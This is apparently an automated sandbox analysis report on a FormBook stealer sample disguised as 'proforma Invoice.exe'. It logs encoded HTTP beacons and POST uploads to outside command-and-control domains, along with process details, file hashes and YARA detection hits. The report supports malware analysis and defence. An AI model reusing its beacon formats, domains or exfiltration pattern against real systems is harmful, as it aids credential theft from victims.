                                                                        Data Ascii: N6gPj2W=GPUc6wmlpUZmvHxdDY7c563ygzbYAWR4WMfeFWm2jB+KxodJJ+UJRW0d6fH7vlu86J5+0xIUjLuiExlbzZj3I4QefoT+GBxgLHaZWpyU1RYKolBazGTlciu0mT2Y57pPcJZwXejJvxoynV1BKyy166VdY7UNInjIaE99fLq5hELXzfsVO9mRqwhxpQu/P2hKWcZud7AwDPBY06zh1k4m4CokHOoxB9Dc0wb2KH2MrSIxgF4plTX2VY8qCXKYdJ2UxICOTWg9NTQiBHxW8EAcdbSI8fe2cfJyF0KO1aupAC8zYpFqMiUi/lVtcpzeYBc4lCy+45dBkDBl46toXYGmBk3b4o4xID+nDtLFN0ncOvj+ywBvy/msJghCCK2/ddqk8Ow/DyMccpDHsGgjiGFv3/lnE7KTMscyWB3SgOZZmMqJ0vbBgVqrbMXrfyl/wgG8jyoKPIpmHaWuANSpUKlm96eJN1NZ4O23Vd9ZlsLbCPw3GAd4UpPpAjye2TGkwau2fKwff9QzG9kLdGThIWc/gVvvG+4VljuyC71ux64XNlM57mzL3IywSy4jiBjRGLteTim71zUkfgbrsrfRFR6+WbYOSiACaJGTvj8mu6dgjaS/9pSUROu+uH+uzMeGqsQGKyH7X3kY+f7YD4owLSEC2yEWsE4kscWnYfI9ZIz3bLftfzPwCHrZn2jyi2ytNAkhtxnH5/avxuntrg+hl5j1IxN+PdymDdx2vdpd64yWMvNJEfa3r0malm1phL8BRIi5fwULuIBXj3+Tf1KinZaEBfRLevR0uZaAxBSQdrgYd2fYM4ZwHoPYjBlFrmuBjBKst+66aP0g4KqnPRMFRQYo5EJmiVueIlHVpma+bhDVJ6RSEch45CDIYFM1PevWwJfid/Gf9hBmVNQCH/6t1/+T3LOk+tAl+b/C8IgWnaGBl/sv5IczBg5sFhQBpt4ROx1sj7DdncMlNa+HVHxzFASWeShZ3seN1SjfnF4P2NbioxMs [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.55001684.32.84.32802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:42.078824043 CET362OUTGET /2k8c/?N6gPj2W=LN885FCenV0arV5pDJ6h3a+LwxHrBQx0V+LnHznGnxO866p5HdYgFA4Q1Lryskeb84lUzgc9oK+kYxVS/Lu8euZMIM/0QxNAF1muDsae+W878EIY9SjqXiybtD+r8qgxLw==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.suerteconysa.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:42.889725924 CET1236INHTTP/1.1 200 OK
                                                                        Server: hcdn
                                                                        Date: Thu, 07 Nov 2024 09:12:42 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 10072
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        x-hcdn-request-id: 9bd01ea1df2fb806607c17976857b318-int-edge2
                                                                        Expires: Thu, 07 Nov 2024 09:12:41 GMT
                                                                        Cache-Control: no-cache
                                                                        Accept-Ranges: bytes
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                        Nov 7, 2024 10:12:42.889894962 CET1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                        Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                        Nov 7, 2024 10:12:42.889909029 CET1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                        Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                        Nov 7, 2024 10:12:42.890188932 CET1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                        Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                        Nov 7, 2024 10:12:42.890207052 CET848INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                        Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                        Nov 7, 2024 10:12:42.890495062 CET1236INData Raw: 63 6c 61 73 73 3d 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 3e 48 61 70 70 79 20 74 6f 20 73 65 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69
                                                                        Data Ascii: class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger
                                                                        Nov 7, 2024 10:12:42.890510082 CET1236INData Raw: 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76
                                                                        Data Ascii: stom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/
                                                                        Nov 7, 2024 10:12:42.890526056 CET1236INData Raw: 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 61 3d 31 32 38 2c 66 3d 30 2c 69 3d 37 32 2c 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b
                                                                        Data Ascii: e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o
                                                                        Nov 7, 2024 10:12:42.890547037 CET912INData Raw: 28 22 2d 22 29 3b 69 3c 76 3b 29 7b 66 6f 72 28 6c 3d 72 2c 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69
                                                                        Data Ascii: ("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.550017195.110.124.133802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:48.123222113 CET624OUTPOST /xtuc/ HTTP/1.1
                                                                        Host: www.nutrigenfit.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.nutrigenfit.online
                                                                        Referer: http://www.nutrigenfit.online/xtuc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 71 6e 54 41 50 4e 75 56 53 52 77 55 63 72 4c 32 70 47 38 6d 74 43 4f 46 42 65 71 35 32 45 4d 7a 39 6d 79 53 45 4b 37 46 65 42 55 74 43 44 31 6e 54 72 5a 42 7a 42 76 4c 4b 63 6e 2f 7a 48 6d 72 38 65 51 37 31 59 62 50 61 4d 51 73 4e 71 77 43 65 4e 61 58 46 6e 59 48 45 70 76 64 6b 71 34 43 59 6e 34 30 45 6c 65 45 59 34 54 4e 48 52 5a 4e 37 34 66 4f 55 36 61 45 6e 6e 4d 68 58 6b 70 42 6f 69 49 4f 6a 47 4f 4a 66 68 49 46 41 6b 63 62 63 4a 41 52 74 66 6a 65 4c 71 4c 37 4d 6b 6f 38 51 56 7a 4d 79 70 65 4e 37 59 66 72 6e 78 4a 72 66 4d 71 42 49 2b 36 52 47 51 4f 49 59 2f 47 4c 30 4e 47 2f 5a 48 55 3d
                                                                        Data Ascii: N6gPj2W=qnTAPNuVSRwUcrL2pG8mtCOFBeq52EMz9mySEK7FeBUtCD1nTrZBzBvLKcn/zHmr8eQ71YbPaMQsNqwCeNaXFnYHEpvdkq4CYn40EleEY4TNHRZN74fOU6aEnnMhXkpBoiIOjGOJfhIFAkcbcJARtfjeLqL7Mko8QVzMypeN7YfrnxJrfMqBI+6RGQOIY/GL0NG/ZHU=
                                                                        Nov 7, 2024 10:12:48.947371960 CET367INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:48 GMT
                                                                        Server: Apache
                                                                        Content-Length: 203
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 74 75 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.550018195.110.124.133802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:50.664100885 CET644OUTPOST /xtuc/ HTTP/1.1
                                                                        Host: www.nutrigenfit.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.nutrigenfit.online
                                                                        Referer: http://www.nutrigenfit.online/xtuc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 71 6e 54 41 50 4e 75 56 53 52 77 55 54 70 66 32 6d 46 45 6d 34 79 4f 45 59 2b 71 35 2f 6b 4d 33 39 6d 4f 53 45 49 57 43 65 79 77 74 43 69 46 6e 55 71 5a 42 6d 42 76 4c 43 38 6e 41 75 58 6d 73 38 65 64 45 31 5a 33 50 61 50 73 73 4e 6f 6f 43 66 38 61 49 46 33 59 46 4c 4a 76 54 67 71 34 43 59 6e 34 30 45 6d 69 2b 59 38 2f 4e 41 67 70 4e 36 61 33 4a 49 71 61 48 77 58 4d 68 64 45 70 46 6f 69 49 34 6a 45 71 6a 66 6a 67 46 41 6e 49 62 66 62 6b 53 6e 66 6a 59 47 4b 4c 73 61 6b 59 7a 53 6a 7a 77 33 36 79 4e 6e 71 44 6f 72 6e 34 42 46 75 69 70 62 65 57 70 57 44 47 2f 4a 50 6e 69 75 75 57 50 48 51 44 69 52 4a 59 74 2f 4d 4c 46 57 73 4d 66 32 75 43 6c 46 32 32 6c
                                                                        Data Ascii: N6gPj2W=qnTAPNuVSRwUTpf2mFEm4yOEY+q5/kM39mOSEIWCeywtCiFnUqZBmBvLC8nAuXms8edE1Z3PaPssNooCf8aIF3YFLJvTgq4CYn40Emi+Y8/NAgpN6a3JIqaHwXMhdEpFoiI4jEqjfjgFAnIbfbkSnfjYGKLsakYzSjzw36yNnqDorn4BFuipbeWpWDG/JPniuuWPHQDiRJYt/MLFWsMf2uClF22l
                                                                        Nov 7, 2024 10:12:51.495136976 CET367INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:51 GMT
                                                                        Server: Apache
                                                                        Content-Length: 203
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 74 75 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.2.550019195.110.124.133802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:53.210819006 CET1661OUTPOST /xtuc/ HTTP/1.1
                                                                        Host: www.nutrigenfit.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.nutrigenfit.online
                                                                        Referer: http://www.nutrigenfit.online/xtuc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 71 6e 54 41 50 4e 75 56 53 52 77 55 54 70 66 32 6d 46 45 6d 34 79 4f 45 59 2b 71 35 2f 6b 4d 33 39 6d 4f 53 45 49 57 43 65 79 34 74 42 51 4e 6e 55 4a 42 42 67 78 76 4c 64 4d 6e 46 75 58 6e 77 38 65 46 41 31 5a 71 74 61 4a 6f 73 50 4e 30 43 59 4f 69 49 4c 33 59 46 54 35 76 53 6b 71 35 41 59 6e 6f 76 45 6d 79 2b 59 38 2f 4e 41 69 78 4e 39 49 66 4a 4b 71 61 45 6e 6e 4d 74 58 6b 70 39 6f 6a 68 4e 6a 45 75 5a 63 54 41 46 41 48 59 62 51 4a 38 53 36 76 6a 61 46 4b 4b 70 61 6b 56 7a 53 6a 48 72 33 36 33 6f 6e 6f 44 6f 6f 41 6c 6a 51 76 43 76 46 63 4b 57 62 41 36 6d 65 72 54 65 75 2b 44 39 4b 41 6e 47 4f 34 42 45 32 6f 72 36 57 2b 74 75 6c 5a 53 2f 42 68 4c 62 71 6b 39 2f 7a 64 75 37 4f 52 62 55 57 47 68 42 2f 44 58 6c 73 79 47 6d 76 72 59 66 65 65 2f 6b 52 45 78 52 2f 77 47 4c 5a 77 35 72 76 53 61 64 5a 6e 6e 65 2b 53 6f 58 65 71 79 32 4f 71 69 4f 42 75 6d 79 45 58 33 56 41 79 6a 4d 4d 72 43 62 4b 31 34 48 55 57 54 59 54 38 4d 49 59 46 62 73 50 68 78 50 61 37 35 74 75 6c 34 57 50 4f [TRUNCATED]
                                                                        Data Ascii: N6gPj2W=qnTAPNuVSRwUTpf2mFEm4yOEY+q5/kM39mOSEIWCey4tBQNnUJBBgxvLdMnFuXnw8eFA1ZqtaJosPN0CYOiIL3YFT5vSkq5AYnovEmy+Y8/NAixN9IfJKqaEnnMtXkp9ojhNjEuZcTAFAHYbQJ8S6vjaFKKpakVzSjHr363onoDooAljQvCvFcKWbA6merTeu+D9KAnGO4BE2or6W+tulZS/BhLbqk9/zdu7ORbUWGhB/DXlsyGmvrYfee/kRExR/wGLZw5rvSadZnne+SoXeqy2OqiOBumyEX3VAyjMMrCbK14HUWTYT8MIYFbsPhxPa75tul4WPOp5smkrlcy8U0DlBSS8oi47vzs056QQsjRcB0OVDDul5R+67qpCCc/XXleArPerPc/J73IFqFlV4fjmqvYBcicRHn3KHtHRN9cmw3lUmEFuGY24o2oW+tsb+WF7bCUuGeBAqsdmxAeCkKrmIr5mBp92RsuNhfXqARj6ftPoPIXbfQUBgDuyDRbWl1orkueAM8pLCPLlNkRltA3iQYA7/kdCb5h8IeWG46qbRlu1cMvX5PYaQ20uaaiRsYM8sLDLbYSbo+pTAkBfJ9vvJp+fI16mkFnhGXMRFilJ0PsS2LKjmp1ApRErXfHMJMxqb3kIK2KBYyWGdZEOXzvLzLlntBnipV6rlx/OWwAVtb2/gNSrafo9DbFUxIzsGAZ1lZYgbw/Etg2zpZEU0XvqkIpihOrcoDd/p2OfkSJ+jigTHz7tT07jAQzeQjrQi3k9Ui7HdrLV2AKILorKPPhmTkCcDtdT1pM8o8CMU2q+1Ou1JuAcX5M0/b4GdiC+VYRO0jXfp1L3C+/xKRhAG9SLT9/6oyY0IwA396diOAOajcr+Rd++xEOnuaGtaPpLyS5RAzYZatj36iJVvC9fpossZcjSw01xCrIYXEJXj6ARKtE5ftiXztNG4ynZl7sx1m+doV0a5KfZtmDB+HEohvXYLt99TGJs+4EBa508AaLV [TRUNCATED]
                                                                        Nov 7, 2024 10:12:54.052321911 CET367INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:53 GMT
                                                                        Server: Apache
                                                                        Content-Length: 203
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 74 75 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.2.550020195.110.124.133802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:55.756026030 CET361OUTGET /xtuc/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=nl7gM5aMdEMYbb3ptVYmv1b7ec2+/kw+vnGGIIbLXQ8RGikaSqRdhk/1NtXc33OFwO5l66LjcfQUL5smZ/PpUkgPTPCZ371zTnVFYiKZa83XWAN88d/vEa+bzXIHSkQ2pw== HTTP/1.1
                                                                        Host: www.nutrigenfit.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:56.585658073 CET367INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:56 GMT
                                                                        Server: Apache
                                                                        Content-Length: 203
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 74 75 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:04:08:54
                                                                        Start date:07/11/2024
                                                                        Path:C:\Users\user\Desktop\proforma Invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\proforma Invoice.exe"
                                                                        Imagebase:0x9e0000
                                                                        File size:972'288 bytes
                                                                        MD5 hash:3757282CE10C90DF6D5E364E22975534
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:04:08:55
                                                                        Start date:07/11/2024
                                                                        Path:C:\Users\user\Desktop\proforma Invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\proforma Invoice.exe"
                                                                        Imagebase:0x5f0000
                                                                        File size:972'288 bytes
                                                                        MD5 hash:3757282CE10C90DF6D5E364E22975534
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
